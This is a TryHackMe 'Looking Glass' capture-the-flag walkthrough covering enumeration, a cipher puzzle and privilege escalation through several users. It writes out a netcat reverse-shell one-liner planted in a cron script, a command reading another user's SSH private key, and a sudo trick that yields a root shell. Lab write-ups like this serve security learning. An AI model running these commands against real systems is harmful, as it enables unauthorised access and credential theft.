Looking Glass

Try Hack Me

Introduction

Climb through the Looking Glass and capture the flags.

Enumeration

We always start scanning our IP to find open ports with NMAP.

Play Time 😅

We'll SSH to the machine choosing any of the ports until we finally find the right one.

Lower = Higher and Higher = Lower (It is a MIRROR)

The port changes it won't be the one appearing here.

Now we are presented with a challenge to decrypt:

We will use this tool to identify the type of cypher. 

One of the results is the vigenère cypher.

Than we will choose Max Key Length 20 and click Auto Solve.

Thank we will insert the Key we found and click Decode

Exploitation

USER.TXT

The last word is the password for the Secret. Which will give us the credentials to log in jabberwock:password. (The password changes).

After log in we find three files. The only one we need is the user.txt (It is a reverse string).

Answer Hidden as per THM request - for more HELP 👉 TROLL ME

ROOT.TXT

Now is the tricky time.

In order to become root we will need to change from user to user until we can escalate our privileges.

Overview: jabberwock -> tweedledum | jabberwock -> humptydumpty | humptydumpty -> alice | alice -> root

Jabberwock -> Tweedledum

In order to escalate to Tweedledum user, we find out under the crontab that the user run the twasBrilling.sh on reboot. So we will paste a reverse shell there.

Kali Machine

nc -nlvp 1234

Jabberwock Machine

cat /etc/crontab

ls

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f" >twasBrilling.sh

sudo -l

reboot

We find inside Tweedledum the humptydumpty.txt file.

We will use this tool to crack the hash.

We will take the last hash (in Hex format) and use ASCII encoding.

Jabberwock -> Humptydumpty 

Now that we got the password we will go back to Jabberwock user and log in to humptydumpty (as the txt file suggests).

su humptydumpty

We than will copy paste alice private key to our kali machine.

cat /home/alice/.ssh/id_rsa

Humptydumpty -> Alice 

We copy the key, change the rights, and SSH to alice.

nano id_rsa

chmod 600 id_rsa

ssh -i id_rsa alice@IP

Alice -> Root

We check for any file containing the name alice. Check the file. Than use it to become root.

find / -name *alice* -type f 2>/dev/null

cat /etc/sudoers.d/alice

sudo -h ssalg-gnikool /bin/bash

whoami

cat /root/root.txt

Answer Hidden as per THM request - for more HELP 👉 TROLL ME